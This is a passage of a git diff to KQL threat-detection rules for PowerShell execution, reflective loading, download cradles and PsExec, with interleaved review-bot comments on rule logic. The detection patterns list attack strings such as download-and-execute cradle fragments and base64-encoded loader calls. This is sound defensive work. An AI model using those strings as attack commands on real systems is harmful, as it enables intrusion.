+// Description: Detects base64 encoded .NET reflective loading of Assembly
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains 
"WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql
index 3c650e17..86b354b4 100644
--- a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql
+++ b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Base64 Encoded WMI Classes
-// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-30
-// Level: high
-// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: PowerShell Base64 Encoded WMI Classes
+// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-30
+// Level: high
+// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine 
contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
index c8b3ebc3..87303c9b 100644
--- a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
+++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
@@ -1,14 +1,14 @@
-// Title: PowerShell Core DLL Loaded By Non PowerShell Process
-// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019-11-14
-// Level: medium
-// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
-// Detects behavior similar to meterpreter's "load powershell" extension.
-// MITRE Tactic: Execution
-// Tags: attack.t1059.001, attack.execution
-// False Positives:
-// - Used by some .NET binaries, minimal on user workstation.
-// - Used by Microsoft SQL Server Management Studio
-
-DeviceImageLoadEvents
+// Title: PowerShell Core DLL Loaded By Non PowerShell Process
+// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-11-14
+// Level: medium
+// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
+// Detects behavior similar to meterpreter's "load powershell" extension.
+// MITRE Tactic: Execution
+// Tags: attack.t1059.001, attack.execution
+// False Positives:
+// - Used by some .NET binaries, minimal on user workstation.
+// - Used by Microsoft SQL Server Management Studio
+
+DeviceImageLoadEvents
 | where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) 
or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql
index 9717cb71..54afef52 100644
--- a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql
+++ b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql
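Review bot: The first two alternatives of the where clause, `InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll"`, test version info of the process doing the loading, while the Sigma image_load fields they appear to have been mapped from describe the loaded image; a loading process will not normally carry the DLL's OriginalFileName, so these branches look dead and the rule effectively reduces to the FolderPath test. If that mapping is what the new backend produces, it is worth confirming against the converter, because DeviceImageLoadEvents as far as I know exposes no version-info columns for the loaded image and the FolderPath branch is the only usable signal. If so, a short comment above the query stating that the version-info branches are a best-effort mapping, or dropping them, would keep later readers from assuming the rule matches on the DLL's metadata. The SQLPS and Visual Studio exclusions in the second `not(...)` are inherited from the source rule and not at issue here.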
@@ -1,12 +1,12 @@
-// Title: PowerShell Download and Execution Cradles
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-24
-// Level: high
-// Description: Detects PowerShell download and execution cradles.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
-
-DeviceProcessEvents
+// Title: PowerShell Download and Execution Cradles
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects PowerShell download and execution cradles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/Execution/powershell_download_pattern.kql
index b36d6c9d..99ceb540 100644
--- a/KQL/rules/Execution/powershell_download_pattern.kql
+++ b/KQL/rules/Execution/powershell_download_pattern.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Download Pattern
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects a Powershell process that contains download commands in its command line string
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: PowerShell Download Pattern
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a Powershell process that contains download commands in its command line string
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql
index 2cf959b8..fc099042 100644
--- a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql
+++ b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Execution With Potential Decryption Capabilities
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-30
-// Level: high
-// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PowerShell Execution With Potential Decryption Capabilities
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-30
+// Level: high
+// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql
index dc383340..87aaddb7 100644
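Review bot: The image test at the end of this rule's where clause joins its two alternatives with `and`: `((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))`, whereas every sibling rule in this patch (Base64 Invoke Keyword, Base64 WMI Classes, Download Pattern) joins the same pair with `or`. With `and`, a PowerShell binary copied to another name never matches, which is exactly the evasion the OriginalFileName check normally exists to cover. If the Sigma source genuinely requires both fields the conversion is faithful and should stay; if it is a backend difference, the line should become `... or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))` for consistency with the other rules.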
--- a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql
+++ b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql
@@ -1,10 +1,10 @@
-// Title: Powershell Inline Execution From A File
-// Author: frack113
-// Date: 2022-12-25
-// Level: medium
-// Description: Detects inline execution of PowerShell code from a file
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Powershell Inline Execution From A File
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects inline execution of PowerShell code from a file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
index 96a353f1..44476920 100644
--- a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
+++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
@@ -1,13 +1,13 @@
-// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
-// Author: Meroujan Antonyan (vx3r)
-// Date: 2025-06-05
-// Level: medium
-// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
-// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
-// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
-// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-06-05
+// Level: medium
+// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
+// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
+// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
+// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
index 5d5ca8da..dd078f85 100644
--- a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
+++ b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Script Execution Policy Enabled
-// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
-// Date: 2023-10-18
-// Level: low
-// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Likely
-
-DeviceRegistryEvents
+// Title: PowerShell Script Execution Policy Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
+// Date: 2023-10-18
+// Level: low
+// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/Execution/powershell_script_run_in_appdata.kql
index ab84e448..c45b5f25 100644
--- a/KQL/rules/Execution/powershell_script_run_in_appdata.kql
+++ b/KQL/rules/Execution/powershell_script_run_in_appdata.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Script Run in AppData
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019-01-09
-// Level: medium
-// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Administrative scripts
-
-DeviceProcessEvents
+// Title: PowerShell Script Run in AppData
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-09
+// Level: medium
+// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
index d78c66d2..2307fbea 100644
--- a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Process Reconnaissance Via Wmic.EXE
-// Author: frack113
-// Date: 2022-01-01
-// Level: medium
-// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Process Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/Execution/psexec_execution.kql
index 8b319c6f..751630a8 100644
--- a/KQL/rules/Execution/psexec_execution.kql
+++ b/KQL/rules/Execution/psexec_execution.kql
@@ -1,12 +1,12 @@
-// Title: Psexec Execution
-// Author: omkar72
-// Date: 2020-10-30
-// Level: medium
-// Description: Detects user accept agreement execution in psexec commandline
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021
-// False Positives:
-// - Administrative scripts.
-
-DeviceProcessEvents
+// Title: Psexec Execution
+// Author: omkar72
+// Date: 2020-10-30
+// Level: medium
+// Description: Detects user accept agreement execution in psexec commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021
+// False Positives:
+// - Administrative scripts.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c"
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
index 09046461..66caf128 100644
--- a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
+++ b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
@@ -1,12 +1,12 @@
-// Title: PsExec Service Child Process Execution as LOCAL SYSTEM
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
-
-DeviceProcessEvents
+// Title: PsExec Service Child Process Execution as LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/Execution/psexec_service_execution.kql
index 56742b39..0286c4be 100644
--- a/KQL/rules/Execution/psexec_service_execution.kql
+++ b/KQL/rules/Execution/psexec_service_execution.kql
@@ -1,12 +1,12 @@
-// Title: PsExec Service Execution
-// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
-// Date: 2017-06-12
-// Level: medium
-// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate administrative tasks
-
-DeviceProcessEvents
+// Title: PsExec Service Execution
+// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: medium
+// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
 | where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/Execution/psexec_service_file_creation.kql
index b1087ac5..50c6f190 100644
--- a/KQL/rules/Execution/psexec_service_file_creation.kql
+++ b/KQL/rules/Execution/psexec_service_file_creation.kql
@@ -1,10 +1,10 @@
-// Title: PsExec Service File Creation
-// Author: Thomas Patzke
-// Date: 2017-06-12
-// Level: low
-// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-
-DeviceFileEvents
+// Title: PsExec Service File Creation
+// Author: Thomas Patzke
+// Date: 2017-06-12
+// Level: low
+// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
 | where FolderPath endswith "\\PSEXESVC.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/Execution/pua_advancedrun_execution.kql
index 6e2ae8db..5f4e73f9 100644
--- a/KQL/rules/Execution/pua_advancedrun_execution.kql
+++ b/KQL/rules/Execution/pua_advancedrun_execution.kql
@@ -1,10 +1,10 @@
-// Title: PUA - AdvancedRun Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// MITRE Tactic: Execution
